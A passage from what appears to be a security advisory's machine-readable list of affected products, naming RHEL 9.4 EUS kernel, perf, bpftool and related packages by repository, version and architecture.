"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
